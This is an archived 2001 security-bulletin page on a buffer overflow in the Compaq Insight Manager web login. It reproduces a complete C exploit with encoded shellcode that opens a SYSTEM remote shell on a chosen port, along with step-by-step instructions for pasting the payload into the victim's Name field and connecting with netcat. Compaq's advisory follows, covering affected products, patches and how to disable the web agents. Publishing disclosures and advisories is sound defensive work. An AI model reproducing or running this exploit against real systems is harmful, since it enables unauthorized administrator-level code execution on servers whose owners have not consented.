TUCoPS :: Web :: General :: web4744.htm

Compaq Insight Manager Web Interface exploits
1st Oct 2001 [SBWID-4744]
COMMAND

	Compaq Insight Manager

SYSTEMS AFFECTED

	Compaq Insight Manager Web Interface

PROBLEM

	 Update

	 ======

	

	Indigo published an exploit for this : the bug is in the  \"User  Name\"
	field of web login :
	

	 

	/*	comphack.c - Compaq Insight Manager 

	overflow exploit by Indigo  2001

	

		Usage: comphack 

	

		This code has been compiled and tested 

	on Linux and Win32

	

		The shellcode spawns a SYSTEM shell on 

	the chosen port

	

		Main shellcode adapted from code written 

	by izan@deepzone.org

	

		Greets to:

	

		Morphsta, Br00t, Macavity, Jacob & 

	Monkfish...Not forgetting D-Niderlunds

	*/

	

	/* #include  uncomment if compiling on 

	Win32 */

	#include 

	

	int main(int argc, char **argv)

	{

					

	unsigned char shellcode[] = 

	

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61

	\\x61\\x61\\x61\\x61\"

	\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x2B\\x16\\xEA\\x77

	\\xFF\\xE1\\x03\\x10\"

	\"\\xEA\\x2F\\x05\\x10\\x90\\x90\\x90\\x90\\x31\\xFF\\x01\\xE7

	\\x31\\xC9\\xB1\\x6F\"

	\"\\x01\\xCF\\xB1\\x4C\\x01\\xCF\\x31\\xC0\\xB0\\x20\\x29\\x07

	\\x31\\xDB\\xB3\\x18\"

	\"\\x01\\xDF\\x29\\x07\\xB3\\x20\\x01\\xDF\\x29\\x07\\xB3

	\\x1D\\x01\\xDF\\x29\\x07\"

	\"\\xB3\\x19\\x01\\xDF\\x29\\x07\\xB3\\x55\\x01\\xDF\\x29\\x07

	\\xB3\\x05\\x01\\xDF\"

	\"\\xB3\\x05\\x01\\xDF\\x29\\x07\\xB3\\x4B\\x01\\xDF\\x29\\x07

	\\xB3\\x12\\x01\\xDF\"

	\"\\x29\\x07\\xB3\\x17\\x01\\xDF\\x29\\x07\\xB3\\x07\\x01

	\\xDF\\x29\\x07\\xB3\\x14\"

	\"\\x01\\xDF\\x29\\x07\\xB3\\x28\\x01\\xDF\\x29\\x07\\xB3

	\\x3F\\x01\\xDF\\x29\\x07\"

	\"\\xB3\\x7C\\x01\\xDF\\x29\\x07\\xB3\\xCE\\x01\\xDF\\x29\\x07

	\\xB3\\x08\\x01\\xDF\"

	\"\\x29\\x07\\xB3\\x3B\\x01\\xDF\\x29\\x07\\xB3\\x4B\\x01

	\\xDF\\x29\\x07\\x66\\x81\"

	\"\\xEF\\xA3\\x03\\x31\\xDB\\xB8\\x5F\\x5F\\x5F\\x5F\\x31\\x07

	\\x47\\x47\\x47\\x47\"

	\"\\x43\\x43\\x43\\x43\\x66\\x81\\xFB\\xFC\\x04\\x7E\\xEF\\xB7

	\\x5F\\x5F\\x5F\\x5F\"

	\"\\x02\\xDE\\xB2\\xA6\\x7E\\x1F\\x5F\\xD2

	\\xEA\\xAD\\x7B\\x1F\\x5F\\xD2\\xE2\\xA5\"

	\"\\x7B\\x1F\\x5F\\x35\\x58\\xCF\\xCF\\xCF\\xCF\\x06\\xB7

	\\xAD\\x5D\\x5F\\x5F\\xD2\"

	\"\\xEA\\x75\\x7A\\x1F\\x5F\\xD2\\xE2\\x6C\\x7A\\x1F\\x5F\\x35

	\\x55\\xCF\\xCF\\xCF\"

	\"\\xCF\\x06\\xB7\\xE5\\x5D\\x5F\\x5F\\x35\\x5F\\xD2\\xEA\\xA6

	\\x7A\\x1F\\x5F\\x09\"

	\"\\xD2\\xEA\\xBA\\x7A\\x1F\\x5F\\x09\\xD2\\xEA\\xB6

	\\x7A\\x1F\\x5F\\x09\\xA0\\xCA\"

	\"\\x6C\\x7A\\x1F\\x5F\\x35\\x5F\\xD2\\xEA\\xA6

	\\x7A\\x1F\\x5F\\x09\\xD2\\xEA\\xB2\"

	\"\\x7A\\x1F\\x5F\\x09\\xD2\\xEA\\xAE\\x7A\\x1F\\x5F\\x09\\xA0

	\\xCA\\x6C\\x7A\\x1F\"

	\"\\x5F\\xB8\\xDA\\xAA\\x7A\\x1F\\x5F\\x1B\\x5F\\x5F\\x5F\\xD2

	\\xEA\\xAA\\x7A\\x1F\"

	\"\\x5F\\x09\\xA0\\xCA\\x68\\x7A\\x1F\\x5F\\xD2\\xEA\\x72\\x79

	\\x1F\\x5F\\xF2\\x0F\"

	\"\\xA0\\xCA\\x0C\\x7A\\x1F\\x5F\\xD2\\xEA\\x6E\\x79

	\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\"

	\"\\x0C\\x7A\\x1F\\x5F\\xD2\\xEA\\xAE\\x7A\\x1F\\x5F\\xD2

	\\xE2\\x72\\x79\\x1F\\x5F\"

	\"\\xFA\\xD2\\xEA\\xBA\\x7A\\x1F\\x5F\\xF2\\xD2\\xE2

	\\x6E\\x79\\x1F\\x5F\\xF4\\xD2\"

	\"\\xE2\\x6A\\x79\\x1F\\x5F\\xF4\\xB8\\xDA\\x7A\\x79

	\\x1F\\x5F\\x5F\\x5F\\x5F\\x5F\"

	\"\\xB8\\xDA\\x7E\\x79\\x1F\\x5F\\x5E\\x5E\\x5F\\x5F\\xD2

	\\xEA\\x66\\x79\\x1F\\x5F\"

	\"\\x09\\xD2\\xEA\\xAA\\x7A\\x1F\\x5F\\x09\\x35\\x5F\\x35

	\\x5F\\x35\\x4F\\x35\\x5E\"

	\"\\x35\\x5F\\x35\\x5F\\xD2\\xEA\\x16\\x79\\x1F\\x5F\\x09\\x35

	\\x5F\\xA0\\xCA\\x64\"

	\"\\x7A\\x1F\\x5F\\x37\\x5F\\x7F\\x5F\\x5F\\xCF\\x37

	\\x5F\\x5D\\x5F\\x5F\\xA0\\xCA\"

	\"\\x1C\\x7A\\x1F\\x5F\\xD6\\xDA\\x0E\\x79

	\\x1F\\x5F\\x6C\\xBF\\x0F\\x1F\\x0F\\x1F\"

	\"\\x0F\\xA0\\xCA\\xA5\\x7B\\x1F\\x5F\\x0F\\x04\\x35\\x4F\\xD2

	\\xEA\\xB6\\x7A\\x1F\"

	\"\\x5F\\x09\\x0C\\xA0\\xCA\\xA1\\x7B\\x1F\\x5F\\x35

	\\x5C\\x0C\\xA0\\xCA\\x5D\\x7A\"

	\"\\x1F\\x5F\\xD2\\xEA\\x2A\\x79\\x1F\\x5F\\x09\\xD2\\xEA\\xB6

	\\x7A\\x1F\\x5F\\x09\"

	\"\\x0C\\xA0\\xCA\\x59\\x7A\\x1F\\x5F\\xD2\\xE2\\x06\\x79

	\\x1F\\x5F\\xF4\\x6C\\xBF\"

	\"\\x0F\\xD2\\xE2\\x3A\\x79\\x1F\\x5F\\x08\\x0F\\x0F\\x0F\\xD2

	\\xEA\\xB6\\x7A\\x1F\"

	\"\\x5F\\xF2\\x0F\\xA0\\xCA\\x60\\x7A\\x1F\\x5F\\x35\\x6F\\xA0

	\\xCA\\x10\\x7A\\x1F\"

	\"\\x5F\\xB4\\x12\\xCF\\xCF\\xCF\\x6C\\xBF\\x0F\\xD2\\xE2

	\\x3A\\x79\\x1F\\x5F\\x08\"

	\"\\x0F\\x0F\\x0F\\xD2\\xEA\\xB6\\x7A\\x1F\\x5F\\xF2\\x0F\\xA0

	\\xCA\\x60\\x7A\\x1F\"

	\"\\x5F\\x35\\x6F\\xA0\\xCA\\x10\\x7A\\x1F\\x5F\\xDC\\xE2

	\\x3A\\x79\\x1F\\x5F\\x5D\"

	\"\\x50\\xDD\\x48\\x5E\\x5F\\x5F\\xDE\\xE2\\x3A\\x79

	\\x1F\\x5F\\x5E\\x7F\\x5F\\x5F\"

	\"\\x2D\\x51\\xCF\\xCF\\xCF\\xCF\\xB8\\xDA\\x3A\\x79

	\\x1F\\x5F\\x5F\\x7F\\x5F\\x5F\"

	\"\\x35\\x5F\\xD4\\xDA\\x3A\\x79\\x1F\\x5F\\xD2\\xE2\\x3A\\x79

	\\x1F\\x5F\\x08\\x0F\"

	\"\\xD4\\xDA\\x0E\\x79\\x1F\\x5F\\x0F\\xD2\\xEA\\xB6

	\\x7A\\x1F\\x5F\\xF2\\x0F\\xA0\"

	\"\\xCA\\x18\\x7A\\x1F\\x5F\\x35\\x6F\\xA0\\xCA\\x10

	\\x7A\\x1F\\x5F\\xD4\\xDA\\x3A\"

	\"\\x79\\x1F\\x5F\\x35\\x5F\\x0F\\xD2\\xEA\\x0E\\x79

	\\x1F\\x5F\\xF2\\x0F\\xD2\\xEA\"

	\"\\x06\\x79\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\\x55

	\\x7A\\x1F\\x5F\\x35\\x5F\\xD2\\xE2\"

	\"\\x3A\\x79\\x1F\\x5F\\x08\\x35\\x5F\\x35\\x5F\\x35\\x5F\\xD2

	\\xEA\\xB6\\x7A\\x1F\"

	\"\\x5F\\xF2\\x0F\\xA0\\xCA\\x60\\x7A\\x1F\\x5F\\x35\\x6F\\xA0

	\\xCA\\x10\\x7A\\x1F\"

	\"\\x5F\\x6C\\xB6\\x66\\xD2\\x3A\\x79\\x1F\\x5F\\x50\\xD8\\x38

	\\xA0\\xA0\\xA0\\x35\"

	\"\\x5F\\x37\\x5F\\x7F\\x5F\\x5F\\xCF\\xD2\\xEA\\x0E\\x79

	\\x1F\\x5F\\xF2\\x0F\\xD2\"

	\"\\xEA\\x06\\x79\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\\x51

	\\x7A\\x1F\\x5F\\xD6\\xDA\\x3E\"

	\"\\x79\\x1F\\x5F\\x35\\x5F\\xD2\\xE2\\x3A\\x79\\x1F\\x5F\\x08

	\\x0F\\xD2\\xEA\\x0E\"

	\"\\x79\\x1F\\x5F\\xF2\\x0F\\xD2\\xEA\\xB2\\x7A\\x1F\\x5F\\xF2

	\\x0F\\xA0\\xCA\\x14\"

	\"\\x7A\\x1F\\x5F\\x35\\x6F\\xA0\\xCA\\x10\\x7A\\x1F\\x5F\\x35

	\\x5F\\xD4\\xDA\\x3E\"

	\"\\x79\\x1F\\x5F\\xD2\\xE2\\x3A\\x79\\x1F\\x5F\\x08\\x0F\\xD4

	\\xDA\\x0E\\x79\\x1F\"

	\"\\x5F\\x0F\\xD2\\xEA\\xB6\\x7A\\x1F\\x5F\\xF2\\x0F\\xA0

	\\xCA\\x18\\x7A\\x1F\\x5F\"

	\"\\x35\\x6F\\xA0\\xCA\\x10\\x7A\\x1F\\x5F\\xB6\\xE6\\xA1\\xA0

	\\xA0\\xD2\\xEA\\x06\"

	\"\\x79\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\\x4D\\x7A\\x1F\\x5F\\xD2

	\\xEA\\x02\\x79\\x1F\"

	\"\\x5F\\xF2\\x0F\\xA0\\xCA\\x4D\\x7A\\x1F\\x5F\\x35\\x5F\\xA0

	\\xCA\\x08\\x7A\\x1F\"

	\"\\x5F\\x0E\\x09\\x37\\x0F\\x6D\\x5A\\x4F\\xCF\\x05\\xA0

	\\x4D\\x0F\\x04\\x06\\x08\"

	\"\\x01\\x0E\\x09\\x0C\\x37\\x07\\x6D\\x5A\\x4F\\xCF\\x05\\xA0

	\\x4D\\x0F\\xF3\\xDB\"

	\"\\xBF\\x2A\\xA4\\x07\\xF4\\x06\\xBD\\xB6\\xBC\\x08\\x0C\\x10

	\\x1C\\x14\\x6C\\x6D\"

	\"\\x5F\\x2C\\x30\\x3C\\x34\\x3A\\x2B\\x5F\\x3D\\x36\\x31

	\\x3B\\x5F\\x33\\x36\\x2C\"

	\"\\x2B\\x3A\\x31

	\\x5F\\x3E\\x3C\\x3C\\x3A\\x2F\\x2B\\x5F\\x2C\\x3A\\x31

	\\x3B\\x5F\"

	\"\\x2D\\x3A\\x3C\\x29\\x5F\\x3C\\x33\\x30\\x2C\\x3A\\x2C\\x30

	\\x3C\\x34\\x3A\\x2B\"

	\"\\x5F\\x14\\x1A\\x2D\\x11\\x1A\\x13

	\\x6C\\x6D\\x5F\\x1C\\x2D\\x3A\\x3E\\x2B\\x3A\"

	\"\\x0F\\x36\\x2F\\x3A\\x5F\\x18

	\\x3A\\x2B\\x0C\\x2B\\x3E\\x2D\\x2B\\x2A\\x2F\\x16\"

	\"\\x31\\x39\\x30

	\\x1E\\x5F\\x1C\\x2D\\x3A\\x3E\\x2B\\x3A\\x0F\\x2D\\x30

	\\x3C\\x3A\"

	\"\\x2C\\x2C\\x1E\\x5F\\x0F\\x3A\\x3A\\x34\\x11\\x3E\\x32

	\\x3A\\x3B\\x0F\\x36\\x2F\"

	\"\\x3A\\x5F\\x18\\x33\\x30\\x3D\\x3E\\x33\\x1E\\x33\\x33\\x30

	\\x3C\\x5F\\x2D\\x3A\"

	\"\\x3E\\x3B\\x19\\x36\\x33\\x3A\\x5F\\x08\\x2D\\x36

	\\x2B\\x3A\\x19\\x36\\x33\\x3A\"

	\"\\x5F\\x0C\\x33\\x3A\\x3A\\x2F\\x5F\\x1C\\x33\\x30

	\\x2C\\x3A\\x17\\x3E\\x31\\x3B\"

	\"\\x33\\x3A\\x5F\\x1A\\x27\\x36\\x2B\\x0F\\x2D\\x30

	\\x3C\\x3A\\x2C\\x2C\\x5F\\x1C\"

	\"\\x30\\x3B\\x3A\\x3B\\x7F\\x3D\\x26\\x7F\\x23\\x05\\x3E\\x31

	\\x7F\\x63\\x36\\x25\"

	\"\\x3E\\x31\\x1F\\x3B\\x3A\\x3A\\x2F\\x25\\x30\\x31\\x3A\\x71

	\\x30\\x2D\\x38\\x61\"

	\"\\x5D\\x5F\\x40\\x17

	\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\"

	\"\\x53

	\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5E\\x5F\\x5F\\x5F\\x5F\\x

	5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x1C\\x12\\x1B\\x71\\x1A\\x07

	\\x1A\\x5F\\x5F\\x5F\\x5F\\x5F\\x4F\\x5F\\x5F\\x5F\"

	\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\

	x5F\\x5F\\x5F\\x5F\"

	\"\\x56\\x56\\x56\\x56\\x56\\x00\";

			

	FILE *fp;

	unsigned short int      a_port;

	

	printf (\"\\nCompaq Insight Manager overflow 

	launcher\\nby Indigo  2001\\n\\n\");

	printf (\"This program will generate a binary file called 

	exploit.bin\\n\");

	printf (\"Connect to the victim using a web browser 

	http://victim:2301\\n\");

	printf (\"Next to \\\'Login Account\\\', click on 

	\\\'anonymous\\\'\\n\");

	printf (\"Enter some random characters into the 

	\\\'password\\\' field\\n\");

	printf (\"Open exploit.bin in notepad, highlight it then 

	copy to the clipboard\\n\");

	printf (\"Paste the exploit into the \\\'Name\\\' field and 

	click OK\\n\");

	printf (\"\\nLaunch netcat: nc  \\n\");

	printf (\"\\nThe exploit spawns a SYSTEM shell on the 

	chosen port\\n\\n\");

	

	if (argc != 2)

	{

		printf (\"Usage: %s \\n\", argv[0]);

		exit (0);

	}

	

	a_port = htons(atoi(argv[1]));

	a_port^= 0x5f5f;

	       

	shellcode[1650]= (a_port) & 0xff;

	shellcode[1651]= (a_port >> 8) & 0xff;

	

	fp = fopen (\"./exploit.bin\",\"wb\");

	

	fputs (shellcode,fp);

	

	fclose (fp);

		

	return 0;

	

	}

	

	

	Compaq Management Software Security Advisory #SSRT0758 :
	

	(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.
	

	Compaq Management Software Security Vulnerability (SSRT0758)
	

	SOURCE: Software Security Response Team U.S.
	        Compaq Computer Corporation

	        *Reference SSRT0758*

	

	PATCHES SUPERSEDED BY THIS ADVISORY:
	

	The  software  upgrades  and  patches  also  fix  all  previous   Compaq
	Management Software security vulnerabilities reported in  the  following
	Compaq Security Advisories:
	

	* Compaq Management Software Security Vulnerability - SSRT0715
	  (March, 2001)

	* Compaq Web-enabled Management Software Security Vulnerability
	  - SSRT0705 (January 2001)

	

	

	SUMMARY
	

	Compaq Management Software products undergo rigorous  quality  assurance
	processes to ensure that they meet the highest  possible  standards  for
	security, reliability and  usability.  In  line  with  this  commitment,
	Compaq  recently  uncovered  a  potential   buffer   overflow   security
	vulnerability   in   its   Web-enabled   Management    Software.    This
	vulnerability has the potential to enable unauthorized users to  execute
	code at an administrator level through  the  exploitation  of  a  buffer
	overflow. Compaq has addressed  this  issue  with  version  5.2  of  the
	Compaq Management Agents and developed a patch that  may  be  downloaded
	from the Compaq website (see  details  below)  to  fix  existing  Agents
	installations.
	

	Compaq strongly recommends that customers upgrade to version 5.2 of  the
	Compaq Management Agents or apply the appropriate patch.
	

	Compaq strongly recommends that  web-enabled  agents  and  utilities  be
	deployed only on private networks and are not used on the open  Internet
	or on systems outside the bounds of the firewall. The implementation  of
	sound security practices, which includes disabling  external  access  to
	Compaq management ports should help to protect customers  from  external
	malicious  attacks.  Compaq  also  recommends   that   strong   password
	standards are used and that passwords are changed regularly.
	

	NOTE: The complete online document is available from
	      http://www.compaq.com/manage/security and should be

	      checked frequently for new patch release information. 

	      If a TBD is entered for a product, please contact your 

	      normal Compaq support channel to inquire about a

	      specific product solution status.

	

	

	SCOPE OF THE PROBLEM
	

	The web component of Compaq  web-enabled  management  software  provides
	HTTP services to allow management information to be  accessible  through
	a web browser. Web-enabled  management  software  is  provided  for  the
	majority  of  the  operating  systems  that  Compaq  supports   on   its
	Intel-based and Alpha-based server and client systems.  These  operating
	systems include Microsoft Windows  9x,  Windows  NT  and  Windows  2000,
	Novell NetWare, SCO UnixWare 7, Red Hat Linux 6.2 and  7.0,  SuSE  Linux
	7.0 & 7.1, Tru64 Unix and Open VMS. Web-enabled management  software
	is also supported for Compaq storage products.
	

	This Security Advisory applies  to  all  Compaq  Web-enabled  Management
	Software.  A  list  of  affected  software  versions  is  available   at
	http://www.compaq.com/products/servers/management/mgtsw-advisory2.html
	(note the url above may wrap unintentionally)
	

	UNAFFECTED SOFTWARE VERSIONS
	

	The web-enabled  component  of  the  Compaq  Remote  Insight  Lights-Out
	Edition board is NOT affected.  Also  unaffected  are  the  downloadable
	integration modules that Compaq provides to enhance  the  management  of
	Compaq platforms from within enterprise management consoles such  as  CA
	Unicenter TNG, Tivoli Enterprise, Tivoli NetView, and HP OpenView.
	

	

	WHAT COMPAQ IS DOING
	

	Compaq is currently completing the testing and release of fixes for  the
	affected software. Compaq Management CD Version 5.2 includes  an  update
	that fixes the buffer overflow  security  vulnerability  issue  in  some
	Compaq Web-enabled Management Software. In  addition  to  releasing  new
	versions of the software, Compaq will also release software  patches  to
	update existing versions of the web-enabled management software.
	

	

	Three    patches    are    now    available    for    download     from:
	ftp://ftp.compaq.com/pub/softpaq/sp17501-18000/
	

	SoftPaq SP 17926   fixes the problem for affected versions of Compaq
	    Foundation Agents for Windows Servers, Compaq Survey for Windows,

	    Compaq Power Manager, Compaq Intelligent Cluster Administrator,  

	    and Compaq Availability Agents. This patch also fixes the problem

	    for the SNMP and DMI agents installed with Compaq Insight Manager

	    XE Version 2.0 and 2.1. Compaq recommends applying the patch if 

	    any of the Compaq Management Software mentioned above is

	    installed.

	

	SoftPaq SP 17927   fixes the problem for affected versions of the
	    Compaq Foundation Agents for Novell NetWare servers. 

	

	SoftPaq SP 17928   fixes the problem for affected versions of the
	    Compaq Foundation Agents for Linux servers

	

	

	Compaq  Security  Advisory  SSRT0758  will  be  updated  as  needed   to
	communicate availability and plans for new versions of all the  affected
	software.
	

	

	WHAT CUSTOMERS SHOULD DO
	

	Determine  which  systems  are  running  Compaq  web-enabled  agents  or
	utilities. There are three methods suggested.
	

	Method 1
	

	Point a web browser to the  system  by  keying  in  http://[IP_ADDRESS]:
	2301 or http://[machine_name]:2301.
	

	This will bring  up  the  device  home  page  for  any  servers  running
	web-enabled management software, and display a list of the components.
	

	NOTE: The lists generated by Methods 2 and 3, while helpful, may not  be
	exhaustive lists of the systems with web-enabled agents  and  utilities.
	The lists will include only those systems that are being managed  either
	explicitly or because they have been discovered.
	

	Method 2
	

	Systems running Compaq Insight Manager XE, can get  a  list  of  systems
	running the web-enabled agents by defining a Query to return a  list  of
	systems with web agents.
	

	 Login to your Compaq Insight Manager XE system and create a new 

	Query. Select the \"Devices with Web Agent\" criteria. - -  -  -  Select
	all of the available products on the Criteria Configuration screen. -  -
	- - Save the Query and execute it. The  list  of  devices  will  be  all
	those with web agents.
	

	Method 3
	

	Systems running Compaq Insight Manager Windows 32  console,  can  get  a
	list of systems running  the  web  agents  by  starting  Compaq  Insight
	Manager and selecting the \"Web Device List\"  button  on  the  toolbar.
	This will display a list of systems  being  managed  by  Compaq  Insight
	Manager and additionally will have underlined as hyperlinks the  systems
	on which the web agents are present and enabled. To print out a list  of
	only the web devices, select the \"Web Devices\" hyperlink in  the  left
	column and only web devices will be shown. Print  this  page  from  your
	browser.
	

	If for any reason the software cannot be updated or the  patch  applied,
	Compaq recommends that the web-enabled components of  Compaq  Management
	Software be temporarily disabled; by following the  procedures  outlined
	at the end of this advisory.
	

	Compaq has always advised  that  web-enabled  agents  and  utilities  be
	deployed only in private networks and not used on  the  Internet  or  on
	systems  outside  the  bounds  of  a  firewall.  Verify  that  you  have
	disallowed access to non-essential IP ports on your  firewall  or  proxy
	protecting the corporate network from the  Internet.  The  disabling  of
	such ports, which include port 2301 (Device Management  Port)  and  port
	280 (Compaq Insight Manager XE  port),  is  part  of  a  sound  security
	policy for your network.
	

	

SOLUTION

	Updated software will be made available on the web  through  the  system
	software                          download                          site
	(http://www.compaq.com/support/files/server/us/index.html)   and    will
	also be proactively delivered directly to customers who  have  installed
	Compaq  ActiveUpdate.  ).  Compaq   recommends   registering   for   the
	ActiveUpdate  service,  which  is  available  at  the   following   URL:
	http://www.compaq.com/activeupdate.
	

	OBTAINING SUPPORT ON THIS ISSUE
	 

	The normal process for obtaining support on Compaq products  is  pursued
	in the country of residence.  .  If  you  do  not  have  an  established
	support process, you may find information about support by visiting  the
	Compaq web site for your country. You can find that web site by  picking
	your country from the list at http://www.compaq.com/worldwide/. You  may
	also  find  a  support  number  for  your  locale  from  the  table   at
	http://www.compaq.com/corporate/overview/world_offices.html
	

	Support can help you to: 1. Identify if you have  an  affected  version.
	2. Obtain the appropriate SoftPaq when it is  available.  3.  Apply  and
	run the SoftPaq. Compaq support personnel are aware of  the  issues  and
	the fixes and are well versed in Compaq systems management products.
	

	

	

	DISABLING THE WEB-ENABLED AGENTS
	

	

	If you are unable to wait for the fix to become available, you  can  use
	the following procedures to disable the web  component  of  the  agents.
	For those cases where it  is  not  possible  to  disable  only  the  web
	component, instructions are provided  below  for  disabling  the  entire
	agent or utility.
	

	Microsoft Windows Servers Web-based management is enabled,  by  default,
	when you install the Compaq Server Management  Agents  for  Windows  NT.
	Perform the following steps to disable web-based management:
	

	1.From the START menu, select SETTINGS, then CONTROL PANEL. 2. From  the
	CONTROL PANEL, select and run the SERVICES  applet.  3.  Select  INSIGHT
	WEB AGENT from the list of services. 4. If  it  is  running,  click  the
	button marked STOP. 5. To prevent it from automatically starting  again,
	click STARTUP and then select DISABLED. 6. Click  OK.  7.  Click  CLOSE.
	This  will  stop  the  web  agents  and  prevent  them   from   starting
	automatically. SNMP management is still enabled.
	

	For Windows 2000 - Right  click  My  Computer  on  the  desktop;  select
	Manage. This will  display  a  window  titled  \"Computer  Management\",
	Click the \"Services\" item  under  the  \"Services  and  Applications\"
	node. The right side of the window will show the services  installed  on
	the system.  Perform steps 3 through 7 from above.
	

	NetWare Server Agents If  you  enabled  web-based  management  when  you
	installed the Compaq Management Agents  for  NetWare,  and  later  would
	like to disable it, perform the following steps from the NetWare  server
	console:
	

	1. LOAD CPQAGIN. 2.  Select  the  option  \"Configure  Existing  NetWare
	Agents\". 3. Select the line that mentions the loading of  CPQWEBAG  and
	select  NO.  4.  Save  changes  and  exit  CPQAGIN.  This  prevents  the
	web-enabled agents from loading. SNMP management is still enabled.
	

	Linux Server Agents To stop running web agent:
	   1. Log in as \"root\".

	   2. Run \"/etc/rc.d/init.d/cmafdtn stop cmawebd\" command.

	To disable web agent so it will not start during  reboot  or  run  level
	changes:
	    1.  Log in as \"root\".

	    2.  Edit \"/etc/rc.d/init.d/cmafdtn\" file (using vi or other

	editors)    and    remove    \"cmawebd\"    from     following     line:
	PNAMES=\"cmafdtnpeerd cmahostd cmathreshd cmawebd\"
	

	SCO UnixWare 7 Agents (UnixWare 2 agents are NOT  Web-Enabled)  To  stop
	running web agent:
	    1.  Log in as \"root\":

	    2.  Run \"sh /etc/init.d/cmaweb stop\" command.

	To disable web agent so it will not be started  during  reboot  or  when
	entering multi-user mode:
	    1.  Log in as \"root\".

	    2.  Run \"rm /etc/rc2.d/[SK]*cmaweb\" command.

	

	

	SCO OpenServer Agents To stop running web agent:
	   1. Log in as \"root\".

